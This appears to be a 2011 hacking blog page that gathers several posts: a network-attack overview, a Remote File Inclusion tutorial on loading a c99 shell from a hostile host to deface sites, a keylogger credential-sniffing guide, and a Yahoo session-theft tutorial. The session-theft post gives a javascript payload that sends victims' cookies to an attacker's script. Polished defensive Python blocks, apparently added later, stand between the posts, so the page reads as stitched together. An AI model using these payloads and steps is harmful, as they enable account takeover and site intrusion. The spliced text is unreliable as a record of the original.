Tuesday 26 April 2011

What are TCP/IP & UDP Attacks?

Hello, let's explain "TCP/IP & UDP Attacks", the most common and effective Web attacks... Let's know about their basics and types...

TCP/IP Attacks
1. TCP SYN or TCP ACK Flood Attack
2. TCP Sequence Number Attack
3. TCP/IP UDP attacks

UDP attacks
1. ICMP Attacks
2. Smurf Attacks
3. ICMP Tunneling

TCP operates using synchronized connections. The synchronization is vulnerable to attack; this is probably the most common attack used today. The synchronization, or handshake, process initiates a TCP connection. This handshake is particularly vulnerable to a DoS attack referred to as the TCP SYN Flood attack. The process is also susceptible to access and modification attacks, which are briefly explained in the following sections.

TCP SYN or TCP ACK Flood Attack - This attack is very common... The purpose of this attack is to deny service. The attack begins as a normal TCP connection: the client and the server exchange information in TCP packets. The TCP client continues to send ACK packets to the server; these ACK packets tell the server that a connection is requested. The server thus responds to the client with an ACK packet, and the client is supposed to respond with another packet accepting the connection to establish the session. In this attack the client continually sends and receives the ACK packets but never opens the session. The server holds these sessions open, awaiting the final packet in the sequence. This causes the server to fill up its available connections and denies any requesting clients access.
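The half-open state described above is what a defender can watch for. The following is an added example (not code from this post): it parses a connection table in the layout of `netstat -ant` output, built here from constructed sample lines, counts the `SYN_RECV` entries on one listening port against the listen backlog, and reports the top sources. The backlog size and the 75% alert threshold are assumed parameters; flood sources are often spoofed, so the total against the backlog is the primary signal rather than any single source.

```python
import re
from collections import Counter

# Constructed sample in the layout of `netstat -ant` output (not captured data):
# proto recv-q send-q local-address foreign-address state
SAMPLE_TABLE = """\
tcp 0 0 10.0.0.5:80 198.51.100.7:40211 SYN_RECV
tcp 0 0 10.0.0.5:80 198.51.100.7:40212 SYN_RECV
tcp 0 0 10.0.0.5:80 198.51.100.7:40213 SYN_RECV
tcp 0 0 10.0.0.5:80 203.0.113.9:51000 SYN_RECV
tcp 0 0 10.0.0.5:80 203.0.113.10:51001 SYN_RECV
tcp 0 0 10.0.0.5:80 203.0.113.11:51002 SYN_RECV
tcp 0 0 10.0.0.5:80 192.0.2.44:33001 ESTABLISHED
tcp 0 0 10.0.0.5:22 192.0.2.45:33002 ESTABLISHED
"""

LINE_RE = re.compile(r"^tcp\s+\d+\s+\d+\s+(\S+):(\d+)\s+(\S+):\d+\s+(\S+)$")

def parse_table(text):
    """Yield (local_port, remote_ip, state) for each connection line."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield int(m.group(2)), m.group(3), m.group(4)

def half_open_report(text, port, backlog, threshold=0.75):
    """Count SYN_RECV (half-open) entries on one listening port.

    A SYN flood shows up as the half-open count approaching the listen
    backlog while few connections ever reach ESTABLISHED. Per-source
    counts are reported too, but the total against the backlog is the
    primary signal because flood sources are usually spoofed.
    """
    half_open = Counter()
    established = 0
    for lport, rip, state in parse_table(text):
        if lport != port:
            continue
        if state == "SYN_RECV":
            half_open[rip] += 1
        elif state == "ESTABLISHED":
            established += 1
    total = sum(half_open.values())
    return {
        "half_open": total,
        "established": established,
        "backlog_used": total / backlog,
        "top_sources": half_open.most_common(3),
        "alert": total >= threshold * backlog,
    }

if __name__ == "__main__":
    print(half_open_report(SAMPLE_TABLE, port=80, backlog=8))
```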

TCP Sequence Number Attack - This is when the attacker takes control of one end of a TCP session. The goal of this attack is to kick the attacked end off the network for the duration of the session. Only then will the attack be successful. Each time a TCP message is sent, the client or the server generates a sequence number. The attacker intercepts it and then responds with a sequence number similar to the one used in the original session. This attack can then hijack or disrupt a session. If a valid sequence number is guessed, the attacker can place himself between the client and the server. The attacker gains the connection and the data from the legitimate system. The only defense against such an attack is to know that it's occurring... There is little that can be done...

TCP Hijacking - This is also called active sniffing. It involves the attacker gaining access to a host in the network and logically disconnecting it from the network. The attacker then inserts another machine with the same IP address. This happens quickly and gives the attacker access to the session and to all the information on the original system.

UDP packets aren't connection oriented and don't require the synchronization process as with TCP. UDP packets, however, are susceptible to interception, thus they can be attacked. UDP, like TCP, doesn't check the validity of an IP address. The nature of this layer is to trust the layer above it (I'm referring to the IP layer). The most common UDP attacks involve UDP flooding. UDP flooding overloads services, networks, and servers. Large streams of UDP packets are focused at a target, causing UDP services on that host to shut down. It can also overload the network and cause a DoS situation to occur.

ICMP Attacks - These occur by triggering a response from the ICMP protocol when it responds to a seemingly legitimate request (think of it as echoing). Ping, for instance, uses the ICMP protocol. sPing is a good example of this type of attack: it overloads the server with more bytes than it can handle, larger connections. It's a ping flood.

Smurf Attacks - This attack uses IP spoofing and broadcasting to send a ping to a group of hosts on a network. When a host is pinged it sends back ICMP message traffic information indicating status to the originator. If a broadcast is sent to the network, all hosts will answer back to the ping. The result is an overload of the network and the target system. The only way to prevent this attack is to prohibit ICMP traffic on the router.

ICMP Tunneling - ICMP can contain data about timing and routes. A packet can be used to hold information that is different from the intended information. This allows an ICMP packet to be used as a communications channel between two systems. The channel can be used to send a Trojan horse or other malicious packet. The countermeasure is to deny ICMP traffic on your network.
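Both the ping flood and the Smurf attack above leave a recognisable trace at the victim, and a monitor can tell them apart. This added example (not from the original post) runs over constructed ICMP summary records of the form (src, dst, type): a Smurf victim receives echo replies from many hosts it never pinged, while a ping flood is a burst of echo requests from one source. The monitored address, the sample data and the thresholds are all assumptions; note that routers also stop acting as Smurf amplifiers when they refuse to forward directed broadcasts, independent of any ICMP filtering.

```python
from collections import Counter

MONITORED = "192.0.2.10"   # the host we defend (constructed address)
ECHO_REPLY, ECHO_REQUEST = 0, 8

def build_sample():
    """Constructed ICMP records: one legitimate ping exchange, then 40
    unsolicited replies (Smurf pattern) and 500 requests from one host."""
    recs = [(MONITORED, "198.51.100.1", ECHO_REQUEST),
            ("198.51.100.1", MONITORED, ECHO_REPLY)]
    recs += [("203.0.113.%d" % i, MONITORED, ECHO_REPLY) for i in range(1, 41)]
    recs += [("198.51.100.77", MONITORED, ECHO_REQUEST)] * 500
    return recs

def icmp_report(records, host, smurf_sources=20, flood_requests=200):
    """Classify ICMP traffic seen at `host`.

    outstanding: echo requests we sent, keyed by the peer we pinged, so a
    reply can be matched to a request. A reply with no matching request is
    unsolicited; many distinct unsolicited reply sources is the Smurf
    signature. Requests per source above flood_requests is a ping flood.
    """
    outstanding = Counter()
    unsolicited = Counter()
    requests = Counter()
    for src, dst, icmp_type in records:
        if src == host and icmp_type == ECHO_REQUEST:
            outstanding[dst] += 1
        elif dst == host and icmp_type == ECHO_REPLY:
            if outstanding[src] > 0:
                outstanding[src] -= 1      # answer to our own ping
            else:
                unsolicited[src] += 1
        elif dst == host and icmp_type == ECHO_REQUEST:
            requests[src] += 1
    return {
        "unsolicited_sources": sorted(unsolicited),
        "smurf": len(unsolicited) >= smurf_sources,
        "flood_sources": [s for s, n in requests.items() if n >= flood_requests],
    }

if __name__ == "__main__":
    print(icmp_report(build_sample(), MONITORED))
```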

Warning: ICMP can be very dangerous.. and even, as I said... Don't try such attacks from your PC until you know how to be invisible on the net! Because once you get traced out... no one can help you out of troubles..

Thank you,

What is Remote File Inclusion (RFI) Web Hacking?

Hey friends... Now we will know about the website hacking method "Remote File Inclusion (RFI)". These exploits are very simple and are only found in about 1 in every 10 sites - they are still a lot of fun to exploit. In this tutorial I will show you how to take advantage of this coding error and possibly take control of the site. This ICA article is for educational purposes only... so please use this for knowledge only!


This article will be understandable mostly by web developers, or those who know some web programming in HTML, PHP, ASP etc... Let's start..


A Remote File Inclusion vulnerability is where we trick the web server into putting our file (file uploader / PHP shell) into the web page. It then parses our PHP script and we then have full control over the server. The exploit works because the website calls another page to be displayed, except we edit the URL so that the website thinks our shell is the page to display.


Normally, I'm against stuff like this. I believe people should find their own vulnerable sites. But, for the sake of this paper, I will show you how we can use Google to get us vulnerable sites.


We will query Google like so:

     inurl:"index.php?page="
This query asks Google to give us any page with index.php?page= in the URL. If we look at it, we can see that 'page' is calling up whatever is after the equals sign. This is where the actual exploit lies. A good test to see if a website is actually vulnerable is to enter http://www.google.com after the equals sign.

    www.site.com/index.php?page=www.google.com
It is not necessary that every site will work like the above statement.... Only those which have the security holes will redirect to Google...
If the full google.com website appears on the page, the website is vulnerable. If not, keep looking. To exploit the vulnerability we must first look at the following example of an RFI:
This is an example only; there are no such sites or files....

      www.shittysite.com/index.php?page=www.theevilhackerz.com/shell.txt


A) Get a free host website (like dajoob or free webs)
B) Put a PHP shell (c99) in text form on the site
C) Insert the path to the shell in the vulnerable host's URL, like the example above.
D) You can then proceed to deface the site etc.
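For the developer on the other side of this, the fix is to never let the `page` parameter name a file directly, and the `page=www.google.com` probe above is also easy to spot in the web server's logs. This is an added example, not code from the post: `resolve_page` maps the parameter onto an allowlist of local template names (any scheme, host or path separator is refused), and `scan_access_log` runs the same check over constructed access-log lines to list the RFI and traversal probes. The allowed page names and the log lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Pages the application actually serves; anything else is refused.
ALLOWED_PAGES = {"home", "about", "contact"}

def resolve_page(page_param):
    """Map the `page` query value to a local template name, or None.

    Only a short bare name is accepted, so a value carrying a scheme, a
    host (www.evil.example/shell.txt) or a traversal path (../../etc/passwd)
    never reaches an include; the name is then checked against the allowlist.
    """
    if not page_param or not re.fullmatch(r"[A-Za-z0-9_-]{1,32}", page_param):
        return None
    return page_param if page_param in ALLOWED_PAGES else None

# Constructed access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Apr/2011:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
203.0.113.6 - - [26/Apr/2011:10:01:09 +0000] "GET /index.php?page=www.google.com HTTP/1.1" 200 9033
203.0.113.6 - - [26/Apr/2011:10:02:15 +0000] "GET /index.php?page=http://198.51.100.9/shell.txt HTTP/1.1" 200 7721
203.0.113.7 - - [26/Apr/2011:10:03:00 +0000] "GET /index.php?page=../../etc/passwd HTTP/1.1" 404 210
"""

REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET (\S+) HTTP/[\d.]+" (\d{3})')

def scan_access_log(text):
    """Return (client, page value, status) for every request whose `page`
    value resolve_page would refuse. A 200 next to a remote URL is the
    'full google.com appears' symptom from the text, seen from the server."""
    hits = []
    for line in text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group(2)).query)
        for value in query.get("page", []):
            if resolve_page(value) is None:
                hits.append((m.group(1), value, int(m.group(3))))
    return hits

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```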


If you have any question or query, then feel free to ask.. Post a comment here!
Thank you,

Decode Keyloggers and Stealers - Get Passwords of Hackers!


Hello, here is a method to hack the hackers.. If you have a keylogger on your computer, and you know the file, this process will easily give you the FTP website they are using so you can get the logs for the files, and if they use the same keylogger on other computers, you'll get the logs for that too.

What is Reverting?
Reverting generally means reversing an action or undoing the changes. Here in our case, reverting would be more of reversing the action. For this we will need a keylogger server using FTP. It can be found on warez sites, YouTube etc.

Tools needed:
1) Keylogger, pass stealer
2) Cain and Abel
3) Virtual machine (so you don't get infected; and what if the hacker is using a better protocol? That'd be an epic fail)

Follow these steps.....
1.) Execute the keylogger on your virtual machine.

2.) Now run Cain and Abel and do the following things in the stated order.


3.) Wait for some time and then check back the passwords area.

4.) As you can see, the keylogger used the FTP protocol to transfer the logs. The FTP protocol isn't very safe since it doesn't encrypt the data. Anyway, you should see the IP address where your PC is sending packets, and also the user name and password. This might not work if the server is using other protocols like HTTP, SMTP etc.; you'll most probably get junk values in the user and pass boxes if those protocols are used.

So I open the IP address http://66.220.9.50/






5.) Now you have the username and pass from "Cain and Abel"... So log in and hit the hacker!!!!
Hope that this article will be helpful for you; now go and collect all viruses and try this method... Hope you will get good results..

Indian Cyber Army (Reg.) Celebrating "Republic Day 2011" Together on Facebook!




Indian Cyber Army (http://www.indiancyberarmy.org/ ) was registered in Jan 2011 under the government. Indian Cyber Army leads the three most important departments of the cyber world.

More than 1000+ Facebook users are using the below picture as their profile pic, to celebrate "Republic Day 2011" together on Facebook!!

We have a target to cover 10000 Facebook profiles till 26th January!! Please keep the below image as your profile picture at least till 31st Jan 2011.

Become part of this event:
Step 1: "Save as Image" the below image to your computer.

Step 2: Now upload the image as your new Facebook profile picture!!

Done!! Thank you!!
If you have any query then join and ask us.

Hack Yahoo Accounts with Session IDs and Session Cookies!

Hello Friends, this is a guest post by Mr. Aneesh M. Makker, admin of http://www.explorehacking.com/, on "Hack Yahoo accounts with Session IDs or session cookies".


What are session IDs or session cookies?
Talking in simple language, whenever we sign into an account it generates a unique piece of string. One copy is saved on the server and the other in our browser as a cookie. Both are matched every time we do anything in our account. This piece of string, or login session, is destroyed when we click on the 'Sign Out' option.

Just log in to yahoo.com. Type in the browser javascript:alert(document.cookie);
You would get a pop-up box showing you the cookies. Now log in to your account and do the same thing; you would see more elements added to the cookies. These represent session IDs.

Note: By saying stealing sessions or stealing cookies, I mean the same thing. Sessions are stored in our browser in the form of cookies.

An attacker can steal that session by convincing the victim to run a piece of code in the browser. The attacker can use that stolen session to log into the victim's account without providing any username/password. This attack is very uncommon because when the victim clicks 'Sign out', the session gets destroyed and the attacker also gets signed out.

But in the case of Yahoo, it's not the same. The attacker doesn't get signed out when the victim clicks 'Sign out'. Though the session automatically gets destroyed after 24 hrs by Yahoo, when the user simply refreshes the window in the Yahoo account, he gets a session for the next 24 hrs. This means, once the Yahoo account session is stolen, the attacker can access the account for a lifetime by refreshing the window every 24 hrs. I am not actually sure whether it's 24 or 48 hrs.

Requirement: Download some files from here
http://www.ziddu.com/downloadlink/13712247/cookiestealer.rar

Tutorial to steal session IDs:-
1. Sign up for an account at any free webhosting site. I have chosen my3gb.com.

2. Log in to your account and go to the file manager. Upload the four files that you have just downloaded.
    Make a new directory 'cookies' here.

3. Give this code to the victim to run in his browser when he is logged in to his Yahoo account. yahoo.php is basically the cookie-stealing script and hacked.php executes the stolen cookies in the browser.
Stolen cookies get stored in the directory 'cookies'.
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie)); 
He would again be redirected to his Yahoo account.

4. Open hacked.php. The password is 'explore'.

You should now have the username of the victim's account. Simply click on it and it would take you to the inbox of the victim's Yahoo account without asking for any password.

Now it doesn't matter if the victim signs out from his account; you would remain logged into it.

Note: You can try this attack by using two browsers. Sign into the Yahoo account in one browser and run the code. Then sign in through the other browser using the stolen session.
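The two weaknesses the post relies on are that the token can be read by script run in the page (the javascript: URL above reads document.cookie) and that 'Sign out' does not kill the copy the attacker holds, while refreshing keeps extending it. This added example (not code from the post or from Yahoo) shows a server-side session store that avoids both: the cookie is issued with HttpOnly and Secure so page script cannot read it, sign-out revokes the token in the store so every copy dies, and activity slides only a short idle timeout under a fixed absolute lifetime. The lifetimes and the injected clock are assumptions for illustration.

```python
import secrets
import time

ABSOLUTE_LIFETIME = 24 * 3600   # hard cap; activity never extends it
IDLE_TIMEOUT = 30 * 60          # the only part a refresh slides forward

class SessionStore:
    """Server-side session table. The cookie carries only an opaque token;
    validity is decided here, so 'Sign Out' can really revoke it."""

    def __init__(self, now=time.time):
        self._now = now            # injectable clock for testing
        self._sessions = {}        # token -> {"user", "created", "last_seen"}

    def login(self, user):
        token = secrets.token_urlsafe(32)   # 256 bits, unguessable
        t = self._now()
        self._sessions[token] = {"user": user, "created": t, "last_seen": t}
        return token

    @staticmethod
    def set_cookie_header(token):
        # HttpOnly keeps document.cookie (and a javascript: URL pasted by the
        # victim) from reading the token; Secure keeps it off plain HTTP.
        return "Set-Cookie: sid=%s; Path=/; HttpOnly; Secure; SameSite=Lax" % token

    def user_for(self, token):
        """Return the user if the token is live, else None (and drop it)."""
        s = self._sessions.get(token)
        if s is None:
            return None
        t = self._now()
        if t - s["created"] > ABSOLUTE_LIFETIME or t - s["last_seen"] > IDLE_TIMEOUT:
            del self._sessions[token]
            return None
        s["last_seen"] = t      # refresh slides the idle timeout, not the cap
        return s["user"]

    def sign_out(self, token):
        """Revoke in the store: a stolen copy of the cookie dies with it."""
        self._sessions.pop(token, None)

if __name__ == "__main__":
    store = SessionStore()
    sid = store.login("demo")
    print(store.set_cookie_header(sid))
    store.sign_out(sid)
    print(store.user_for(sid))   # None: the token is gone server-side
```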

Indian Institute of Management (IIM-B) Bangalore website hacked


The website of the Indian Institute of Management-Bangalore has been hijacked by hackers peddling erectile dysfunction products like Viagra. The website, www.iimb.ernet.in, has been out of service for at least ten days.

Cached versions of its home page during the period show the IIM masthead superseded by ads for purchasing Viagra online without prescriptions.

Yahoo! PH Purple Hunt 2.0 Ad Compromised!


Earlier the other day, I was browsing through the Yahoo! PH site and the Yahoo! Purple Hunt 2.0 ad caught my attention.

Curious as I am, I clicked on the ad and surprisingly my browser downloaded a suspicious file named com.com.

Apparently this ad redirected me to a randomly generated URL similar to the following which, unfortunately, led to the malicious download:


Below is a screenshot of the file download dialog box:
The downloaded file is detected by Trend Micro as TSPY_PIRMINAY.A. Let’s see how the download took place.

Firstly, the download only happens once per browser, which means that the malvertisement may have used IP and user-agent filtering of some sort to prevent multiple downloads, which would make it suspicious to the end user.

To be able to replicate the malware download from the compromised ad, we used a browser extension which spoofs browser user agents, instead of installing different browsers.

It appears that the advertisement is first redirected to the malware download before it finally brings the browser to the real advertisement page. The redirection follows this format for the download link:

http://{varying string}{random number}.{varying domain}/se/{constant string or guid}/com.com

We’d like to thank the guys over at Yahoo! Ad Security Ops for acting swiftly on our initial report, taking down the malvertisement so it could no longer harm unsuspecting users.